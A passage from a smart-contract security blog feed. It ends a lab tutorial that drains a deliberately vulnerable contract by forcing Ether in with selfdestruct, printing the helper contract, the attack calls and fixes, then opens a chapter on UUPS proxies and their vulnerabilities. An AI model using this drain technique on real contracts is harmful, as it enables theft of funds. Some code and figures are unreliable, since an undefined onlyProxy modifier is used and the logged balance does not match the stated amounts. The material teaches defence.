-   We log the current balance of the **CrystalTowerTreasure** contract, which should now be 15 ETH (10 ETH from the initial deposit and 5 ETH from **`selfdestruct`**).

### **Draining the Contract with `claimTreasure()`**

```solidity
tower.claimTreasure();
console.log(&quot;Attack finished balance: &quot;, attacker.balance / 1 ether);

```

Now comes the final step:

-   We call the **`claimTreasure()`** function, which checks the contract’s total balance (15 ETH) and determines that it should transfer the entire balance to us.
-   Since the balance exceeds the 15 ETH threshold, the contract transfers **all its Ether** to the attacker.

We log the attacker’s final balance, which now includes all the Ether from the contract.

### **Helper Contract: GrimoireOfDestruction**

```solidity
pragma solidity ^0.8.0;

contract GrimoireOfDestruction {
    constructor() payable {}

    function castDestructionSpell(address payable crystalTower) public {
        selfdestruct(crystalTower);
    }
}

```

This contract is the key to bypassing the **0.02 ETH limit**. When we call **`castDestructionSpell()`**, it executes **`selfdestruct(crystalTower)`**, instantly transferring 5 ETH directly into the balance of the vulnerable contract. Because the contract doesn’t check the source of its balance, it assumes this Ether is legitimate.

# **Proof of Exploit: Taking Control of the Contract Balance**

As you can see from the image, we’ve successfully executed the **GrimoireOfDestruction** payload to bypass the 0.02 ETH limit and trick the vulnerable contract into giving us all its funds. Now that we understand how the exploit works, let’s break down the key details shown in the logs and explain why this attack was successful.

```bash
forge script script/Exploit.sol --broadcast

```

![](/content/images/2025/02/image.png)

Successful Attack

The initial setup starts with the attacker holding 10 ETH, fully prepared to carry out the exploit. The **GrimoireOfDestruction** contract is then deployed and funded with 5 ETH, an amount that will play a key role in inflating the balance of the vulnerable **CrystalTowerTreasure** contract.

Once deployed, the **selfdestruct** operation is triggered within the **GrimoireOfDestruction** contract. This action sends the 5 ETH directly into the **CrystalTowerTreasure** contract, completely bypassing its deposit mechanism and any restrictions it enforces on legitimate deposits.

With the contract balance inflated, the attacker proceeds to make a small, legitimate deposit of 0.01 ETH through the **depositGold** function. This small deposit ensures that the attacker is registered as an adventurer in the contract’s internal mapping. The real magic happens when the attacker calls **claimTreasure()**. Since the contract blindly trusts its external balance without verifying the legitimacy of the funds, it calculates the withdrawal amount based on the total balance, including the 5 ETH injected via **selfdestruct**.

As shown in the logs, the attacker’s balance increases to **10,010 ETH**. This indicates that the entire balance of the **CrystalTowerTreasure** contract has been drained successfully, including the funds from the initial deposit and the injected 5 ETH. The vulnerability lies in the contract’s reliance on its external balance without validating the origin of those funds, making it an easy target for this exploit.

# **Fixing the Vulnerability: How to Protect the Treasure from Selfdestruct Attacks**

## Track Internal Deposits Only

We’ve successfully exploited the **CrystalTowerTreasure** contract, but the goal of any pentest is to learn and improve security. So, how do we prevent this type of attack? The key is understanding the vulnerability: the contract blindly trusts its external Ether balance, allowing attackers to manipulate it via **`selfdestruct`**. To fix this, we need to ensure that **only legitimate deposits are counted** when determining how much Ether can be withdrawn. Let’s explore how to do that.

Instead of relying on the contract’s **external balance** (`address(this).balance`), we should maintain an **internal balance that is updated only through legitimate deposits**. This ensures that even if an attacker injects Ether using **`selfdestruct`**, it won’t affect the internal accounting logic.

Here’s how you can modify the contract:

```solidity
function claimTreasure() public {
    Adventurer storage adventurer = adventurers[msg.sender];
    require(adventurer.deposit &gt; 0, &quot;No treasure to claim.&quot;);
    require(!adventurer.hasWithdrawn, &quot;Rewards already claimed.&quot;);

    uint256 amountToTransfer = adventurer.deposit; // Only transfer what was legitimately deposited.

    // Mark the adventurer as having withdrawn and update the internal balance
    adventurer.hasWithdrawn = true;
    totalDeposits -= adventurer.deposit;

    payable(msg.sender).transfer(amountToTransfer);
}

```

**What’s different here?**  
We no longer rely on the contract’s **external balance**. Instead, we only allow users to withdraw their **tracked deposits**, ensuring that the **`selfdestruct`\-injected Ether is ignored**.

## **Disable External Ether Transfers**

To further protect the contract, you can disable direct Ether transfers by making the fallback and receive functions revert any incoming funds that aren’t part of a legitimate deposit. This prevents unwanted Ether from being injected into the contract’s balance.

```solidity
// Reject direct Ether transfers that bypass deposit logic
receive() external payable {
    revert(&quot;Direct Ether transfers are not allowed.&quot;);
}

fallback() external payable {
    revert(&quot;Invalid function call.&quot;);
}

```

By doing this, any attempt to inject Ether directly into the contract will fail, making **`selfdestruct`** attacks much harder to execute.

## Consider Upgrading to OpenZeppelin’s Payment Solutions

If the contract involves more complex scenarios (e.g., reward pools, staking), consider using libraries like **OpenZeppelin’s PaymentSplitter** or **PullPayment**. These libraries help manage fund withdrawals securely while preventing common pitfalls, including those involving external balance manipulation.

# **Conclusions: Lessons Learned from Cracking (and Fixing) the Treasure Chest**

Congratulations, fellow adventurer! 🎉 You’ve successfully navigated through the depths of Ethereum’s **selfdestruct** mechanics, unraveled a clever vulnerability, and drained a contract like a true pentesting legend. But before you pack up your gear and sail off into the sunset, let’s pause to reflect on the key takeaways.

🔑 **1\. The Power of Unexpected Ether**  
As we’ve seen, the ability to inject Ether into a contract using **selfdestruct** isn’t just a theoretical problem—it’s a real-world weakness lurking in many smart contracts. If a contract blindly trusts its external balance, attackers can easily exploit this trust to bypass restrictions, manipulate logic, and drain funds. The lesson here? **Always validate where funds come from.**

💣 **2\. Small Vulnerabilities Lead to Big Exploits**  
A deposit limit of 0.02 ETH may sound like a robust control, but **assumptions kill security.** In this case, the developers assumed that deposits would only come through their carefully guarded deposit function. But all it took was a small helper contract with **selfdestruct** to bypass that restriction and trigger a financial meltdown. When designing smart contracts, remember: **think like an attacker.** What you assume to be safe might just be their entry point.

🛡 **3\. Fixing Isn’t Optional—it’s Essential**  
We didn’t just break this contract for fun (although, let’s be honest, it was fun 😄). The true value of pentesting lies in improving security. By tracking **internal deposits only** and rejecting **unexpected Ether**, we’ve shown how developers can patch this exploit and protect their treasure chests from unwanted looters.

🚫 **4\. Know When to Say “No” to Ether**  
The most direct fix? Don’t accept funds from unknown sources. Implementing fallback and receive functions that reject any direct Ether transfers helps close this backdoor and keeps your contract’s balance clean and safe.

👷 **5\. Security is a Continuous Journey**  
The Ethereum world evolves quickly, and so do the threats. The **selfdestruct** mechanism may have been partially neutered with the Cancun hard fork, but similar exploits will continue to emerge. As a developer or pentester, you must **stay vigilant**. Always question how funds are handled, and **never trust blindly.**

✨ **Final Thoughts**  
In the end, this journey wasn’t just about exploiting a smart contract; it was about understanding how tiny assumptions can lead to massive exploits—and how, with a little creativity, they can be patched. Whether you’re a pentester uncovering vulnerabilities or a developer securing your contracts, this adventure highlights one crucial truth:

**Security isn’t a feature—it’s a process.** And now, you’re a part of it. 👾💡

# References

-   **Solidity Documentation**. &quot;Deactivate and Self-destruct.&quot; Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#deactivate-and-self-destruct](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#deactivate-and-self-destruct)
-   **SolidityScan Blog**. &quot;Security Implications of selfdestruct() in Solidity — Part 1.&quot; Available at: [https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-1-3d40e24a48d8](https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-1-3d40e24a48d8)
-   **SolidityScan Blog**. &quot;Security Implications of selfdestruct() in Solidity — Part 2.&quot; Available at: [https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-2-371b0a0b6ede](https://blog.solidityscan.com/security-implications-of-selfdestruct-in-solidity-part-2-371b0a0b6ede)
-   **Ethereum Improvement Proposals**. &quot;EIP-6780: SELFDESTRUCT only in same transaction.&quot; Available at: [https://eips.ethereum.org/EIPS/eip-6780](https://eips.ethereum.org/EIPS/eip-6780)
-   **Ethereum Improvement Proposals**. &quot;EIP-6049: Deprecate SELFDESTRUCT.&quot; Available at: [https://eips.ethereum.org/EIPS/eip-6049](https://eips.ethereum.org/EIPS/eip-6049)
-   **OpenZeppelin Documentation**. &quot;Writing Upgradeable Contracts.&quot; Available at: [https://docs.openzeppelin.com/upgrades-plugins/writing-upgradeable](https://docs.openzeppelin.com/upgrades-plugins/writing-upgradeable)</content:encoded><author>Ruben Santos</author></item><item><title>UUPS Proxies: A Double-Edged Sword – Efficient Upgrades, Hidden Risks</title><link>https://www.kayssel.com/post/web3-12</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-12</guid><description>In this chapter, we explore UUPS Proxies, their efficiency, and security trade-offs compared to Transparent Proxies. We break down their architecture, deployment, and common vulnerabilities. We also examine Beacon, Minimal, and Diamond Proxies, analyzing their risks and real-world use cases. 🚀</description><pubDate>Sun, 02 Feb 2025 09:52:06 GMT</pubDate><content:encoded># **Introduction**

Welcome back! In the previous chapter, [we explored **Transparent Proxies**](https://www.kayssel.com/post/web3-11/), the classic method for upgrading smart contracts while keeping the same address. We saw how they work, why they’re useful, and, of course, how they can be completely **wrecked** if left unprotected. But just when you thought you had proxies figured out, here comes another player—**UUPS Proxies**.

UUPS (Universal Upgradeable Proxy Standard) proxies take a **leaner, more efficient approach**. Instead of making the **proxy contract** handle upgrades (like in Transparent Proxies), **UUPS shifts that responsibility to the implementation contract itself**. This cuts down the proxy’s complexity, reduces gas costs, and keeps things **lightweight**. However, **this also means that security must be airtight**, because any mistakes in the implementation contract could leave your system completely exposed.

In this chapter, we’ll **break down how UUPS Proxies work**, compare them to Transparent Proxies, and—because we know bad things happen—we’ll also explore **what can go wrong and how to protect against it**. You’ll also get **hands-on** with an implementation, see an upgrade in action, and, by the end, have a clear understanding of **why UUPS proxies have become the preferred choice for many developers**.

But UUPS isn’t the **only** alternative to Transparent Proxies. As we progress, we’ll also **look at other proxy patterns** that pop up in the blockchain world, like **Beacon Proxies, Minimal Proxies (Clones), Diamond Proxies, and Static Proxies**. Each has its own use case, strengths, and, of course, **potential pitfalls**.

So, if you’re ready to level up your proxy knowledge—and avoid catastrophic upgrade failures—let’s get started. 🚀

# UUPS Proxies: What Are They?

**UUPS proxies** (Universal Upgradeable Proxy Standard) are a type of proxy used in Ethereum smart contracts to enable upgrades. Unlike Transparent Proxies, where the upgrade logic is managed by the proxy itself, UUPS proxies shift that responsibility to the **implementation contract**.

This design makes UUPS proxies simpler and more gas-efficient because the proxy only focuses on forwarding calls, while the implementation contract handles upgrades when needed. Essentially, the proxy acts as a pass-through, and the implementation contains the logic for both the contract’s functionality and its upgrade process.

In short, UUPS proxies allow you to:

-   **Upgrade contract logic** while keeping the same address.
-   **Save gas** by reducing the size and complexity of the proxy.
-   Keep the system flexible while maintaining functionality.

It’s a cleaner, more efficient way to handle upgrades in the blockchain world, but the shift of upgrade logic to the implementation also means extra care is needed to secure it.

# Breaking Down the Proxy Code

Let’s speed through the proxy implementation—after all, this is practically the same setup we used in the [Transparent Proxy](https://www.kayssel.com/post/web3-11/) from the last chapter. If you’ve read that section, you’re already 90% of the way there. But let’s refresh the key pieces and point out what makes this proxy tick.

&lt;details&gt;
&lt;summary&gt;UUPS Proxy&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract UUPSProxy {
    // Storage slot for the implementation address (EIP-1967-compliant)
    bytes32 private constant IMPLEMENTATION_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

    // Storage slot for the admin address (EIP-1967-compliant)
    bytes32 private constant ADMIN_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);


    // Constructor to initialize the implementation and admin
    constructor(address initialImplementation, address adminAddress) {
        require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
        require(adminAddress != address(0), &quot;Admin cannot be zero address&quot;);

        _setImplementation(initialImplementation);
        _setAdmin(adminAddress);
    }

    // Fallback function to delegate all calls to the implementation
    fallback() external payable {
        _delegate();
    }

    receive() external payable {
        _delegate();
    }

    // Internal function to delegate the call to the implementation contract
    function _delegate() internal {
        address impl = _getImplementation();
        require(impl != address(0), &quot;Implementation not set&quot;);

        assembly {
            // Copy calldata
            calldatacopy(0, 0, calldatasize())

            // Delegatecall to the implementation
            let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)

            // Copy returndata
            returndatacopy(0, 0, returndatasize())

            // Revert or return based on the result
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    // Internal function to retrieve the implementation address
    function _getImplementation() internal view returns (address impl) {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            impl := sload(slot)
        }
    }

    // Internal function to set the implementation address
    function _setImplementation(address newImplementation) internal {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            sstore(slot, newImplementation)
        }
    }

    // Internal function to retrieve the admin address
    function _getAdmin() internal view returns (address adm) {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            adm := sload(slot)
        }
    }

    // Internal function to set the admin address
    function _setAdmin(address newAdmin) internal {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            sstore(slot, newAdmin)
        }
    }
}

```
&lt;/details&gt;


#### **1\. Storage Slots: The Foundation**

Just like in the Transparent Proxy, we’re working with two storage slots defined by the EIP-1967 standard:

-   **`IMPLEMENTATION_SLOT`**: Holds the address of the contract with the logic (the implementation).
-   **`ADMIN_SLOT`**: Stores the address of the admin who’s allowed to upgrade the implementation.

Here’s how they’re defined:

```solidity
bytes32 private constant IMPLEMENTATION_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);
bytes32 private constant ADMIN_SLOT = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);

```

The reason for EIP-1967 is simple: it ensures these slots won’t overlap with the variables in your implementation contract. If the Transparent Proxy was your intro to this concept, then this is just a quick reminder—it’s the same approach.

#### **2\. Constructor: Setting Up the Proxy**

When deploying the proxy, we initialize the implementation and admin addresses in the constructor:

```solidity
constructor(address initialImplementation, address adminAddress) {
    require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
    require(adminAddress != address(0), &quot;Admin cannot be zero address&quot;);

    _setImplementation(initialImplementation);
    _setAdmin(adminAddress);
}

```

This is straightforward:

1.  Validate the addresses.
2.  Store them in their respective storage slots.

#### **3\. Fallback and Receive: Delegating Calls**

As with the Transparent Proxy, the `fallback` and `receive` functions handle all incoming calls and forward them to the implementation contract:

```solidity
fallback() external payable {
    _delegate();
}

receive() external payable {
    _delegate();
}

```

These functions make the proxy a middleman, passing along requests without ever executing them itself. The real work happens in `_delegate`.

#### **4\. The `_delegate` Function: Forwarding the Action**

Here’s where the magic happens. The `_delegate` function forwards calls to the implementation, just like in the Transparent Proxy:

```solidity
function _delegate() internal {
    address impl = _getImplementation();
    require(impl != address(0), &quot;Implementation not set&quot;);

    assembly {
        calldatacopy(0, 0, calldatasize())
        let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
        returndatacopy(0, 0, returndatasize())

        switch result
        case 0 { revert(0, returndatasize()) }
        default { return(0, returndatasize()) }
    }
}

```

This function:

1.  Retrieves the implementation address from `IMPLEMENTATION_SLOT`.
2.  Uses `delegatecall` to execute the function in the implementation’s context.
3.  Returns the result or reverts if something goes wrong.

#### **5\. Internal Helpers: Managing the Slots**

We’re reusing the same helper functions for reading and writing to the storage slots:

```solidity
function _getImplementation() internal view returns (address impl) {
   bytes32 slot = IMPLEMENTATION_SLOT;
   assembly {
       impl := sload(slot)
   }
}

function _setImplementation(address newImplementation) internal {
   bytes32 slot = IMPLEMENTATION_SLOT;
   assembly {
       sstore(slot, newImplementation)
   }
}

function _getAdmin() internal view returns (address adm) {
   bytes32 slot = ADMIN_SLOT;
   assembly {
       adm := sload(slot)
   }
}

function _setAdmin(address newAdmin) internal {
   bytes32 slot = ADMIN_SLOT;
   assembly {
       sstore(slot, newAdmin)
   }
}

```

# Breaking Down the Implementation Contract

Now that we’ve covered the proxy, it’s time to dive into **ImplementationV1**, where the real magic happens. This contract not only contains the application’s logic but also the critical **upgrade mechanism** that makes this a true UUPS Proxy system. Let’s break it down step by step.

&lt;details&gt;
&lt;summary&gt;Implementation&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract ImplementationV1 {
    event UpgradeAttempt(address sender, address newImplementation);
    event AdminCheck(address sender, address admin);
    event DebugMessage(string message);
    event DebugMessageAddress(string message, address value);

    uint256 public storedValue;


    function upgradeTo(address newImplementation) external onlyProxy {
        emit DebugMessage(&quot;Entered upgradeTo&quot;);
        emit UpgradeAttempt(msg.sender, newImplementation);

        address admin = _getAdmin();
        emit AdminCheck(msg.sender, admin);

        require(admin == msg.sender, &quot;Not authorized&quot;);
        emit DebugMessage(&quot;Admin check passed&quot;);

        require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);
        emit DebugMessage(&quot;New implementation address valid&quot;);

        // Use the EIP-1967 implementation slot
        bytes32 implementationSlot = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

        // Log current implementation for debugging
        address currentImplementation;
        assembly {
            currentImplementation := sload(implementationSlot)
        }
        emit DebugMessageAddress(&quot;Current implementation&quot;, currentImplementation);

        // Update the implementation slot
        assembly {
            sstore(implementationSlot, newImplementation)
        }
        emit DebugMessage(&quot;Implementation updated successfully&quot;);
    }

    function getVersion() public pure returns (string memory) {
        return &quot;v1&quot;;
    }

    function setStoredValue(uint256 value) public onlyProxy {
        storedValue = value;
    }

    function getStoredValue() public view returns (uint256) {
        return storedValue;
    }

    function _getAdmin() internal view returns (address) {
        bytes32 slot = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);
        address adm;
        assembly {
            adm := sload(slot)
        }
        return adm;
    }
    
}

```
&lt;/details&gt;


#### **1\. Upgrade Mechanism: The `upgradeTo` Function**

At the heart of this implementation is the `upgradeTo` function, which allows the admin to update the proxy’s implementation address. This is what sets UUPS apart from Transparent Proxies—the implementation itself manages the upgrades.

Here’s the code:

```solidity
function upgradeTo(address newImplementation) external {
    emit DebugMessage(&quot;Entered upgradeTo&quot;);
    emit UpgradeAttempt(msg.sender, newImplementation);

    address admin = _getAdmin();
    emit AdminCheck(msg.sender, admin);

    require(admin == msg.sender, &quot;Not authorized&quot;);
    emit DebugMessage(&quot;Admin check passed&quot;);

    require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);
    emit DebugMessage(&quot;New implementation address valid&quot;);

    // Use the EIP-1967 implementation slot
    bytes32 implementationSlot = bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1);

    // Log current implementation for debugging
    address currentImplementation;
    assembly {
        currentImplementation := sload(implementationSlot)
    }
    emit DebugMessageAddress(&quot;Current implementation&quot;, currentImplementation);

    // Update the implementation slot
    assembly {
        sstore(implementationSlot, newImplementation)
    }
    emit DebugMessage(&quot;Implementation updated successfully&quot;);
}

```

### What’s Happening Here?

1.  **Authorization Check:**  
    The function ensures only the admin (stored in the proxy’s `ADMIN_SLOT`) can perform the upgrade. If the caller isn’t the admin, the call fails with a `Not authorized` error.
2.  **Validation:**  
    It checks that the `newImplementation` address is valid (not `address(0)`).
3.  **Update the Implementation Slot:**  
    Using low-level assembly, the function updates the `IMPLEMENTATION_SLOT` in the proxy’s storage. This ensures the proxy delegates future calls to the new implementation.
4.  **Debugging Events:**  
    The function emits several events, such as the current and new implementation addresses, to make it easier to debug during upgrades.

This mechanism ensures that the upgrade process is both flexible and secure, as long as the admin address is properly managed.

#### **2\. Versioning: The `getVersion` Function**

To make upgrades transparent, the contract includes a simple versioning mechanism:

```solidity
function getVersion() public pure returns (string memory) {
    return &quot;v1&quot;;
}

```

This is useful for verifying which implementation the proxy is currently using. After an upgrade, calling `getVersion` through the proxy lets you confirm that the new implementation is in place.

#### **3\. Core Logic: Business Functions**

The contract also includes application-specific logic. In this case, we have two simple functions for storing and retrieving a value:

```solidity
function setStoredValue(uint256 value) public {
    storedValue = value;
}

function getStoredValue() public view returns (uint256) {
    return storedValue;
}

```

### How Does It Work?

1.  **`setStoredValue`:** Stores a value in the proxy’s storage. Remember, thanks to `delegatecall`, the state is stored in the proxy, not the implementation.
2.  **`getStoredValue`:** Retrieves the stored value, allowing users to confirm that the proxy’s state is preserved across upgrades.

#### **4\. Admin Retrieval: The `_getAdmin` Function**

To securely retrieve the admin address, the contract includes an internal helper function:

```solidity
function _getAdmin() internal view returns (address) {
   bytes32 slot = bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1);
   address adm;
   assembly {
       adm := sload(slot)
   }
   return adm;
}

```

-   The admin address is stored in the proxy’s `ADMIN_SLOT`, and this function allows the implementation to read it safely.
-   Without this, the implementation wouldn’t know who is authorized to perform upgrades.

# Deploying the UUPS Proxy and Implementation

The deployment process for the UUPS Proxy and its implementation is managed using a simple Foundry script. The script handles everything from deploying the contracts to setting up the proxy and its admin. Let’s walk through how it works.

```solidity
pragma solidity ^0.8.0;
import &quot;forge-std/Script.sol&quot;;
import &quot;../../src/UUPS-Proxy/UUPS-Proxy.sol&quot;;
import &quot;../../src/UUPS-Proxy/ImplementationUUPS.sol&quot;;


contract Deploy is Script {
    function run() external {
        // Start broadcasting transactions
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Step 1: Deploy the ImplementationV1 contract
        ImplementationV1 implementation = new ImplementationV1();
        console.log(&quot;ImplementationUUPS deployed at:&quot;, address(implementation));

        // Step 2: Deploy the Transparent Proxy contract
        UUPSProxy proxy = new UUPSProxy(address(implementation), vm.envAddress(&quot;ADMIN_ADDR&quot;));
        console.log(&quot;UUPSProxy deployed at:&quot;, address(proxy));

        // End broadcasting transactions
        vm.stopBroadcast();
    }
}

```

The deployment begins with the `run` function, which starts broadcasting transactions. This ensures that all subsequent actions, like contract deployments, are signed and sent to the blockchain using the admin’s private key. The admin key is securely provided via environment variables, keeping sensitive information safe.

The first step in the deployment is to deploy the implementation contract. In this case, it’s `ImplementationV1`, which contains all the core logic and the `upgradeTo` function for future upgrades. Once deployed, the address of the implementation contract is logged for reference. This address is essential, as it will be used to link the proxy to the implementation.

Next, the UUPS Proxy is deployed. The proxy is initialized with the address of the implementation contract and the admin’s address. The admin address, also passed through environment variables, is stored in the proxy to grant the admin control over future upgrades. The address of the proxy is logged, as it will serve as the permanent entry point for interacting with the system. All user interactions with the smart contract will go through this proxy, even as the underlying implementation changes over time.

Finally, the script stops broadcasting transactions. This ensures that no unintended actions are sent to the blockchain beyond the deployments. At this point, both the proxy and the implementation contracts are deployed and linked, and the system is ready to use.

To execute this script, you simply run it with Foundry, specifying the local Anvil testnet or any desired blockchain environment. Once the script completes, the deployment is finalized, and the addresses of the proxy and implementation are logged, ensuring everything is in place for interaction or further testing.

This deployment script sets up a clean foundation for the UUPS Proxy system. With the proxy now in place, users can interact with the contract seamlessly while the admin retains the flexibility to upgrade the implementation when needed. The result is a dynamic and upgradeable system, ready for action.

![](/content/images/2025/01/image-12.png)

Running the deployment script

# Interacting with and Upgrading the Proxy

Now that we’ve deployed the UUPS Proxy and its first implementation, it’s time to interact with it and see the magic of seamless upgrades in action. This script demonstrates how to use the proxy to store a value, verify the implementation version, and even upgrade to a new implementation—all while keeping the same proxy address. Let’s break it down.

```solidity
pragma solidity ^0.8.0;


import &quot;forge-std/Script.sol&quot;;


interface IUUPSProxy {
    function setStoredValue(uint256 value) external;
    function getStoredValue() external view returns (uint256);
    function upgradeTo(address newImplementation) external;
    function getVersion() external view returns (string memory);
}

contract Interact is Script {
  IUUPSProxy proxy = IUUPSProxy(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);
  function run() external {
    vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));
    proxy.setStoredValue(150);
    console.log(&quot;Version: &quot;, proxy.getVersion());
    proxy.upgradeTo(0xDc64a140Aa3E981100a9becA4E685f962f0cF6C9);
    console.log(&quot;Version: &quot;, proxy.getVersion());
    console.log(&quot;The value is: &quot;, proxy.getStoredValue());
    vm.stopBroadcast();
  }
}

```

#### **1\. Setting Up the Script**

The script starts by importing Foundry’s scripting utilities and defining an interface, `IUUPSProxy`. This interface allows us to interact with the proxy’s key functions, such as storing and retrieving values, checking the implementation version, and upgrading the implementation.

&lt;details&gt;
&lt;summary&gt;The script references a deployed proxy by its address:&lt;/summary&gt;

```solidity
IUUPSProxy proxy = IUUPSProxy(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

```
&lt;/details&gt;


This hardcoded address (`0xe7f...`) is the proxy’s address from deployment. All interactions, including the upgrade, will be routed through this proxy.

#### **2\. Starting Transactions**

As with the deployment script, the first step is to start broadcasting transactions:

```solidity
vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

```

This ensures all actions in the script are signed with the admin’s private key (`ADMIN_KEY`) provided via environment variables. Since we’re about to call functions that require admin permissions, this step is critical.

#### **3\. Interacting with the Proxy**

The script first demonstrates how to use the proxy to store and retrieve values.

```solidity
proxy.setStoredValue(150);
console.log(&quot;Version: &quot;, proxy.getVersion());

```

Here’s what happens:

-   `**setStoredValue(150)**`: Calls the `setStoredValue` function in the implementation via the proxy. The value `150` is stored in the proxy’s storage (not the implementation’s).
-   `**getVersion()**`: Calls the `getVersion` function to check the version of the current implementation. Initially, this should return `&quot;v1&quot;` (or whatever the first implementation specifies).

This shows how the proxy seamlessly delegates calls to the implementation while keeping its own state intact.

#### **4\. Upgrading the Implementation**

&lt;details&gt;
&lt;summary&gt;The real highlight of the script is the upgrade process:&lt;/summary&gt;

```solidity
proxy.upgradeTo(0xDc64a140Aa3E981100a9becA4E685f962f0cF6C9);
console.log(&quot;Version: &quot;, proxy.getVersion());

```
&lt;/details&gt;


Here’s how it works:

-   `**upgradeTo(0xDc64...)**`: This updates the proxy to point to a new implementation contract. The address `0xDc64...` represents the new implementation (`ImplementationV2`, for example).
-   `**getVersion()**`: After the upgrade, this function checks the version of the new implementation, which should now reflect the new version (e.g., `&quot;v2&quot;`).

The magic here is that the proxy’s address stays the same, so users don’t need to update anything on their end. All changes happen under the hood.

#### **5\. Verifying the Upgrade**

Finally, the script retrieves the stored value to confirm that the proxy’s state is intact even after the upgrade:

```solidity
console.log(&quot;The value is: &quot;, proxy.getStoredValue());

```

Since the proxy holds the storage, the value `150` stored earlier is still available after upgrading the implementation. This demonstrates the power of the UUPS Proxy pattern: you can enhance functionality without losing data or requiring users to switch addresses.

#### **6\. Stopping Transactions**

&lt;details&gt;
&lt;summary&gt;The script ends by stopping the broadcast of transactions:&lt;/summary&gt;

```solidity
vm.stopBroadcast();

```
&lt;/details&gt;


This ensures that no unintended actions are sent to the blockchain after the script completes.

![](/content/images/2025/01/image-13.png)

Running a script to interact and Upgrade de implementation

# **Common Vulnerabilities in UUPS Proxies**

Now that we&apos;ve covered the structure and benefits of UUPS proxies, it’s time to discuss their **vulnerabilities**. Since **UUPS shifts the upgrade logic from the proxy to the implementation contract**, it introduces new attack surfaces that must be carefully managed. While some risks overlap with Transparent Proxies, UUPS has unique weaknesses that require additional precautions.

Let’s break down the most common vulnerabilities and how to mitigate them.

## **Lack of Access Control (Anyone Can Upgrade the Proxy)**

Since the upgrade function is in the **implementation contract**, poor access control can allow **anyone to call `upgradeTo`**, replacing the implementation with a malicious one.

#### **How It Happens:**

-   The `upgradeTo` function is **left public** or does not properly check the admin role.
-   A **stolen admin private key** is used to upgrade to a malicious contract.
-   The contract lacks **multi-signature (multi-sig) governance**, making upgrades too easy.

## **Storage Collisions (Breaking State Between Upgrades)**

UUPS proxies **share storage with their implementations**, meaning that **misaligned storage layouts** in new implementations can **corrupt contract state**.

#### **How It Happens:**

-   A new implementation **reorders or removes storage variables**, shifting storage slots.
-   Developers **forget to follow EIP-1967**, causing unexpected overlaps.
-   The upgrade process **accidentally overwrites the admin or implementation slot**, making the contract unusable.

## **Losing Admin Control (Permanent Loss of Authority)**

If the **admin address is set to `address(0)`**, the contract **becomes unmanageable**, making further upgrades impossible.

#### **How It Happens:**

-   The **admin address is accidentally removed** in an upgrade.
-   A developer **tries to disable upgrades** but unintentionally makes the contract unmanageable.
-   An attacker tricks the contract into setting an **unreachable admin address**.

## **Lack of Access Control in Implementation Functions**

#### **How It Happens:**

Even if the proxy enforces strict access control, **the implementation contract itself might expose sensitive functions**. If the implementation is not properly secured, **attackers can call its functions directly**, bypassing the intended proxy restrictions.

#### **How It Happens:**

1.  **The implementation has critical functions (e.g., `upgradeTo`, `setAdmin`, `withdrawFunds`) left public or insufficiently restricted.**
2.  **An attacker calls these functions directly** on the implementation contract instead of through the proxy.
3.  **Because the implementation does not store state**, interactions may not behave as expected, but in some cases, they can still be dangerous.
4.  **Critical state variables stored in the proxy may be modified**, leading to unauthorized upgrades, fund withdrawals, or loss of control.

# Exploring the Remaining Proxy Patterns and Their Vulnerabilities

After looking at UUPS and Transparent Proxies, it’s time to explore the other proxy patterns available. Each comes with unique strengths and use cases but also introduces specific vulnerabilities that need to be addressed. Here’s a breakdown of the major proxy types, their features, and the common pitfalls they might encounter.

## **Beacon Proxy: Centralized Logic for Shared Updates**

The Beacon Proxy pattern introduces a central contract, called the **Beacon**, which stores the address of the implementation. Multiple proxies use the same Beacon to determine where to delegate calls, making it a shared brain for upgradeable logic. When you upgrade the implementation in the Beacon, every proxy connected to it is updated simultaneously.

```mermaid
graph LR
    Beacon[&quot;Beacon Contract&quot;]
    Implementation[&quot;Implementation Logic&quot;]
    Proxy1[&quot;Proxy Instance 1&quot;]
    Proxy2[&quot;Proxy Instance 2&quot;]
    Proxy3[&quot;Proxy Instance 3&quot;]

    Proxy1 --&gt;|Delegate Calls| Implementation
    Proxy2 --&gt;|Delegate Calls| Implementation
    Proxy3 --&gt;|Delegate Calls| Implementation
    Implementation &lt;--&gt;|Controlled By| Beacon

```

**Key Features:**

-   Shared implementation across multiple proxies, reducing deployment costs.
-   Efficient for factory-like setups where all instances require the same logic.

**Main Vulnerabilities:**

